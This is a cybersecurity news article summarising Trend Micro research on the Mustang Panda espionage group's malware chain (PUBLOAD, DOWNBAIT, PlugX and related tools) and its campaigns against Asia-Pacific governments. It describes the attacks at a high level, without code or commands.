Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments

The threat actor monitored as Mustang Panda has upgraded its malware arsenal to incorporate new tools in order to assist data exfiltration and the deployment of next-stage payloads, according to fresh findings from Trend Micro.

The cybersecurity outfit, which is monitoring the activity cluster under the moniker Earth Preta, claimed it saw "the propagation of PUBLOAD via a variant of the worm HIUPAN."

PUBLOAD is a known downloader virus associated to Mustang Panda since early 2022, launched as part of cyber assaults targeting government agencies in the Asia-Pacific (APAC) area to distribute the PlugX malware.

"PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option," security researchers Lenart Bermejo, Sunny Lu, and Ted Lee said.

Mustang Panda's usage of detachable devices as a propagation vector for HIUPAN was originally uncovered by Trend Micro in March 2023. It's monitored by Google-owned Mandiant as MISTCLOAK, which it discovered in conjunction with a cyber espionage operation targeting the Philippines that may have began as long back as September 2021.

PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx), while also serving as a conduit for a new hacking tool dubbed FDMTP, which is a "simple malware downloader" implemented based on TouchSocket over Duplex Message Transport Protocol (DMTP).

The recorded information is compressed into a RAR archive and exfiltrated to an attacker-controlled FTP server using cURL. Alternatively, Mustang Panda has also been detected launching a bespoke software termed PTSOCKET that may transmit data in multi-thread mode.

Furthermore, Trend Micro has ascribed the attacker to a "fast-paced" spear-phishing operation that it noticed in June 2024 as circulating email messages containing a .url attachment, which, when opened, is used to deploy a signed downloader called DOWNBAIT.

The effort is suspected to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan based on the filenames and content of the fake documents utilized.

DOWNBAIT is a first-stage loader tool that's used to obtain and execute the PULLBAIT shellcode in memory, which then downloads and executes the first-stage backdoor referred to as CBROVER.

The implant, for its part, enables file download and remote shell execution capabilities, alongside operating as a delivery mechanism for the PlugX remote access trojan (RAT). PlugX then takes care of launching another specialized file collector called FILESAC that may gather the victim's files.

The revelation comes after Palo Alto Networks Unit 42 disclosed Mustang Panda's manipulation of Visual Studio Code's inbuilt reverse shell capability to create a foothold in target networks, demonstrating that the threat actor is actively modifying its modus operandi.

"Earth Preta has shown significant advancements in their malware deployment and strategies, particularly in their campaigns targeting government entities," the researchers added. "The group has evolved their tactics, [...] leveraging multi-stage downloaders (from DOWNBAIT to PlugX) and possibly exploiting Microsoft's cloud services for data exfiltration."